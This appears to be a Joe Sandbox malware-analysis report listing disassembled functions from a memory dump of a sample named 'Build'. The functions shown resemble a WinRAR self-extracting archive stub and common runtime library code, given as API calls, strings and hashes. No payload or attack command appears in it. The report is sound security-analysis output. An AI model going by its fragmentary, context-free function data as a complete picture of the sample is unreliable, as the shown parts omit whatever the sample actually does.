Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ItemText$Dialog
String ID: GETPASSWORD1$Software\WinRAR SFX
API String ID: 1770891597-1315819833
Opcode ID: 669796cc5935e00a46c5e550653fd58ba0ca3831a86349ce7fe1de37eba3bdf8
Instruction ID: cca16272b666bffa0b3e226cf506fbdcd01aabf08a8421239ec42266727e057a
Opcode Fuzzy Hash: 669796cc5935e00a46c5e550653fd58ba0ca3831a86349ce7fe1de37eba3bdf8
Instruction Fuzzy Hash: FD41B3B2504208ABEB32AB64DC45FFE77BCEF49714F108429FA09E7181DB74A9448B65

Function 0036E033 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 00372663: _wcslen.LIBCMT ref: 00372669

Part of subcall function 0036D848: _wcsrchr.LIBVCRUNTIME ref: 0036D85F

_wcslen.LIBCMT ref: 0036E105
_wcslen.LIBCMT ref: 0036E14D

Strings

.rar, xrefs: 0036E04F, 0036E0A2
.sfx, xrefs: 0036E088
.exe, xrefs: 0036E079

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: 1a249c016e801f3aea817c49dc70c5409b41e3d9b25e65e301cab15482cdab9d
Instruction ID: 1af911a5f66c43eec8f760471f598b2845ea387226ace93fddcf1e0bea5a2e35
Opcode Fuzzy Hash: 1a249c016e801f3aea817c49dc70c5409b41e3d9b25e65e301cab15482cdab9d
Instruction Fuzzy Hash: 4B41322A50071199CB33AF35C846A7BB7A8EF42744B12C90EF9869B088E7A49D89D355

Function 0036DA1E Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0036DA59
GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0036BD19,?,?,00000800,?,?,?,0036BCD4), ref: 0036DB02
_wcslen.LIBCMT ref: 0036DB70

Strings

UNC, xrefs: 0036DAE8
\\?\, xrefs: 0036DA90, 0036DADC, 0036DB38, 0036DB87

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen$CurrentDirectory
String ID: UNC$\\?\
API String ID: 3341907918-253988292
Opcode ID: cc8472bb2482e5da0c33c1b90f78a353b3829d8e7bf919c39b29e946a98766d4
Instruction ID: ba5886d4be9bd87db0eb563ee2a41df5e4b2ef8ae62f02b2b9004cecbeb6bdfd
Opcode Fuzzy Hash: cc8472bb2482e5da0c33c1b90f78a353b3829d8e7bf919c39b29e946a98766d4
Instruction Fuzzy Hash: EC419231E043416ACA33AF608D82DFF73BCAF55740F02885AF98897149EBE49945D662

Function 003610E0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00361136
_wcslen.LIBCMT ref: 0036115A
_wcslen.LIBCMT ref: 00361187
_wcslen.LIBCMT ref: 003611AC

Strings

%8, xrefs: 00361227

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _wcslen
String ID: %8
API String ID: 176396367-940007118
Opcode ID: afd77ca6aff1449ffc187af1dc324875165073d9448be5d2bf479ba5458ba055
Instruction ID: 6aab79adba2c5cf489d48a3fc31b1f9c7e2e7af0430a5c9bdc6e85d11c47935d
Opcode Fuzzy Hash: afd77ca6aff1449ffc187af1dc324875165073d9448be5d2bf479ba5458ba055
Instruction Fuzzy Hash: 6241D2B15047519BC322EF38C94599FBBE8FF85300F05492DF989D7250DB30E9058B96

Function 0037D9DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 0037D9ED
GetObjectW.GDI32(00000000,00000018,?), ref: 0037DA12
DeleteObject.GDI32(00000000), ref: 0037DA44
DeleteObject.GDI32(00000000), ref: 0037DA67

Part of subcall function 0037C652: FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,0037DA3D,00000066), ref: 0037C665
Part of subcall function 0037C652: SizeofResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C67C
Part of subcall function 0037C652: LoadResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C693
Part of subcall function 0037C652: LockResource.KERNEL32(00000000,?,?,?,0037DA3D,00000066), ref: 0037C6A2
Part of subcall function 0037C652: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6BD
Part of subcall function 0037C652: GlobalLock.KERNEL32(00000000,?,?,?,?,?,0037DA3D,00000066), ref: 0037C6CE
Part of subcall function 0037C652: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0037C737
Part of subcall function 0037C652: GlobalUnlock.KERNEL32(00000000), ref: 0037C756
Part of subcall function 0037C652: GlobalFree.KERNEL32(00000000), ref: 0037C75D

Strings

], xrefs: 0037DA1A

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: GlobalResource$Object$BitmapDeleteLoadLock$AllocCreateFindFreeFromGdipSizeofUnlock
String ID: ]
API String ID: 1428510222-3352871620
Opcode ID: 4a95b16afe982f17f785f71114ebf5942db90b4617fa2c76b441441147e61f62
Instruction ID: 26e43e807130df82abc94c5805e8c6514bb4989d93f9b3617157885a78883009
Opcode Fuzzy Hash: 4a95b16afe982f17f785f71114ebf5942db90b4617fa2c76b441441147e61f62
Instruction Fuzzy Hash: 4F01C43250461166C73367655C05A7F7A7EAF82761F194118BC0CEB291DF799C058BA0

Function 0037F950 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00361366: GetDlgItem.USER32(00000000,00003021), ref: 003613AA
Part of subcall function 00361366: SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0

EndDialog.USER32(?,00000001), ref: 0037F99B
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0037F9B1
SetDlgItemTextW.USER32(?,00000066,?), ref: 0037F9C5
SetDlgItemTextW.USER32(?,00000068), ref: 0037F9D4

Strings

RENAMEDLG, xrefs: 0037F968

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: c66439768e237502340dfb137596d2ee4920efa0d86420c166a96c06861a008d
Instruction ID: e83aa9721170b2216f3908fb0936fd229219b3297accd0775bd734890725e709
Opcode Fuzzy Hash: c66439768e237502340dfb137596d2ee4920efa0d86420c166a96c06861a008d
Instruction Fuzzy Hash: 5601F1322852107ED2239B289C08FAB775CFB8B701F11C421F349E2190CB66AA008B65

Function 0038A6C5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0038A676,?,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002), ref: 0038A6E5
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0038A6F8
FreeLibrary.KERNEL32(00000000,?,?,?,0038A676,?,?,0038A616,?,0039F7B0,0000000C,0038A76D,?,00000002,00000000), ref: 0038A71B

Strings

CorExitProcess, xrefs: 0038A6F0
mscoree.dll, xrefs: 0038A6DE

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: aeda548225d5fe871456f133676190f70b712a1cfa040dedbdca312fa0420ca3
Instruction ID: f5fbb0ea94d03f50512844b5f7558da381ee2bb4a3faeb5f575fef0dc897d4cd
Opcode Fuzzy Hash: aeda548225d5fe871456f133676190f70b712a1cfa040dedbdca312fa0420ca3
Instruction Fuzzy Hash: 06F04430505608BBDF12AFE4DC8AB9EBFB9EB08751F0141AAF805A6150DB315D40DB91

Function 00361366 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 00370244: _swprintf.LIBCMT ref: 00370284
Part of subcall function 00370244: _strlen.LIBCMT ref: 003702A5
Part of subcall function 00370244: SetDlgItemTextW.USER32(?,003A2274,?), ref: 003702FE
Part of subcall function 00370244: GetWindowRect.USER32(?,?), ref: 00370334
Part of subcall function 00370244: GetClientRect.USER32(?,?), ref: 00370340

GetDlgItem.USER32(00000000,00003021), ref: 003613AA
SetWindowTextW.USER32(00000000,003965F4), ref: 003613C0

Strings

pP:, xrefs: 0036137B
0, xrefs: 00361369
pP:, xrefs: 003613CB

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ItemRectTextWindow$Client_strlen_swprintf
String ID: 0$pP:$pP:
API String ID: 2622349952-3110409460
Opcode ID: ad414e310706452adae188f0e0597e22670b8160c3e7c140645eb615fb806e2c
Instruction ID: 30dbfa041b845de7b61c6d347a4987742a72be98105332f09f39902f450cb133
Opcode Fuzzy Hash: ad414e310706452adae188f0e0597e22670b8160c3e7c140645eb615fb806e2c
Instruction Fuzzy Hash: 2BF0A43450424CA6DF170F229C0DBE93B6CEB02314F09C114FC4A94A96C7B4C950EF50

Function 003851FA Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 003852C1
___AdjustPointer.LIBCMT ref: 003852E4
_abort.LIBCMT ref: 00385332
___AdjustPointer.LIBCMT ref: 00385380

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: AdjustPointer$_abort
String ID:
API String ID: 2252061734-0
Opcode ID: 6f57785f23e35765207e16b0fdc2f68db1991f88b940c2e05c95b3fab9ba7e6b
Instruction ID: 7e66a4ccf86da50de1b57029aabe87f9ed0fd31040ee4e5d7a16b5848aa08cb4
Opcode Fuzzy Hash: 6f57785f23e35765207e16b0fdc2f68db1991f88b940c2e05c95b3fab9ba7e6b
Instruction Fuzzy Hash: 3E51F376601B069FDB27BF50E841BBAB7A4EF54350F1544ADEC029B691E7B1EC40CB90

Function 0038E580 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0038E589
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0038E5AC

Part of subcall function 0038BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00386A24,?,0000015D,?,?,?,?,00387F00,000000FF,00000000,?,?), ref: 0038BCC0

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0038E5D2
_free.LIBCMT ref: 0038E5E5
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0038E5F4

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 485812add596adde14b1c901f338c367b1d6fa5f512e1eaa54377a38c946b861
Instruction ID: 74dc15d016cd9a5979f088d9c8cab487ae79befa543420e5b6aff16601355149
Opcode Fuzzy Hash: 485812add596adde14b1c901f338c367b1d6fa5f512e1eaa54377a38c946b861
Instruction Fuzzy Hash: 5901D4726023127F6B2376765C89C7B6A6DEEC3BA831601AAB805C6205FE61CD0183B0

Function 0038BA29 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0038BC80,0038D7D8,?,0038B9D3,00000001,00000364,?,0038688D,?,?,003A50C4), ref: 0038BA2E
_free.LIBCMT ref: 0038BA63
_free.LIBCMT ref: 0038BA8A
SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BA97
SetLastError.KERNEL32(00000000,?,003A50C4), ref: 0038BAA0

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 01547d1b903dbb9aedad083dcbcc2b559f2f01e9b2d05422b6c3c8df9d7ce46c
Instruction ID: eaffcb0531acdef0970e744df83b9815404f3110928e694e2b7926cf27007d38
Opcode Fuzzy Hash: 01547d1b903dbb9aedad083dcbcc2b559f2f01e9b2d05422b6c3c8df9d7ce46c
Instruction Fuzzy Hash: 4F01F936105B03ABC21FB7396C87D6B626DDFC2371B2100A5F52596292EF6ACD019320

Function 00372FC9 Relevance: 7.5, APIs: 5, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 003732AF: ResetEvent.KERNEL32(?), ref: 003732C1
Part of subcall function 003732AF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003732D5

ReleaseSemaphore.KERNEL32(?,00000040,00000000,92C77967,?,?,00000001,?,003952FF,000000FF,?,003743C0,?,00000000,?,00364766), ref: 00373007
CloseHandle.KERNEL32(?,?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001), ref: 00373021
DeleteCriticalSection.KERNEL32(?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001,?), ref: 0037303A
CloseHandle.KERNEL32(?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001,?), ref: 00373046
CloseHandle.KERNEL32(?,?,003743C0,?,00000000,?,00364766,?,?,?,00000000,?,?,?,00000001,?), ref: 00373052

Part of subcall function 003730CA: WaitForSingleObject.KERNEL32(?,000000FF,003731E7,?,?,0037325F,?,?,?,?,?,00373249), ref: 003730D0
Part of subcall function 003730CA: GetLastError.KERNEL32(?,?,0037325F,?,?,?,?,?,00373249), ref: 003730DC

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 95a63533aac48b7dab03a4aea82f5d4d71e923debd7e3af7cfb6d2d23848f673
Instruction ID: 4e4b6e64de4f24eb5ee1139bd09eafadd66c2953306510c3e2dcc078292b5aaa
Opcode Fuzzy Hash: 95a63533aac48b7dab03a4aea82f5d4d71e923debd7e3af7cfb6d2d23848f673
Instruction Fuzzy Hash: BB118072504B44EFC7239F64DCC6BC6BBADFB08710F00492AF16B92260CB766A44DB50

Function 0038EE4F Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0038EE67

Part of subcall function 0038BAFA: RtlFreeHeap.NTDLL(00000000,00000000,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?), ref: 0038BB10
Part of subcall function 0038BAFA: GetLastError.KERNEL32(?,?,0038EEE6,?,00000000,?,00000000,?,0038EF0D,?,00000007,?,?,0038F30A,?,?), ref: 0038BB22

_free.LIBCMT ref: 0038EE79
_free.LIBCMT ref: 0038EE8B
_free.LIBCMT ref: 0038EE9D
_free.LIBCMT ref: 0038EEAF

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d34e2220570cb8203be54a4c5f1211e24345dc51980e37b88e7cc4e65fc562a4
Instruction ID: fd6aa2040f7e69e292d01886e6e434a57fb6720c26b758b4e8e9782c7a355ace
Opcode Fuzzy Hash: d34e2220570cb8203be54a4c5f1211e24345dc51980e37b88e7cc4e65fc562a4
Instruction Fuzzy Hash: 3CF0EC32505304AFC666FB6DE885C9BB7EEBE41711B660885F449DB650CB74FC808B50

Function 0037C79C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

Part of subcall function 0037C629: GetDC.USER32(00000000), ref: 0037C62D
Part of subcall function 0037C629: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0037C638
Part of subcall function 0037C629: ReleaseDC.USER32(00000000,00000000), ref: 0037C643

GetObjectW.GDI32(?,00000018,?), ref: 0037C7E0

Part of subcall function 0037CA67: GetDC.USER32(00000000), ref: 0037CA70
Part of subcall function 0037CA67: GetObjectW.GDI32(?,00000018,?), ref: 0037CA9F
Part of subcall function 0037CA67: ReleaseDC.USER32(00000000,?), ref: 0037CB37

Strings

f8, xrefs: 0037C82F
(, xrefs: 0037C935

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868808368.0000000000396000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003A9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C2000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1868841461.00000000003C6000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1869028538.00000000003C7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_360000_Build.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: ($f8
API String ID: 1061551593-2255768631
Opcode ID: e85735f10175ee07f0a0582866fc85e48756b556236208dc4e75a7a84835f55f
Instruction ID: b817966a319cf1145257e6b3e86752b2c885d399b74de5e7de27ce0ff52adf28
Opcode Fuzzy Hash: e85735f10175ee07f0a0582866fc85e48756b556236208dc4e75a7a84835f55f
Instruction Fuzzy Hash: 1B91E271618354AFD621DF29C845E2BBBF8FF89B00F00495EF48AD7260CB75A905CB62

Function 00373748 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 203COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00373910
_swprintf.LIBCMT ref: 003739BF

Strings

%ls, xrefs: 00373795, 003737AB
%s: %s, xrefs: 0037391F

Memory Dump Source

Source File: 00000005.00000002.1868731833.0000000000361000.00000020.00000001.01000000.00000007.sdmp, Offset: 00360000, based on PE: true

Associated: 00000005.00000002.1868689221.0000000000360000.00000002.00000001.01000000.00000007.sdmpDownload File
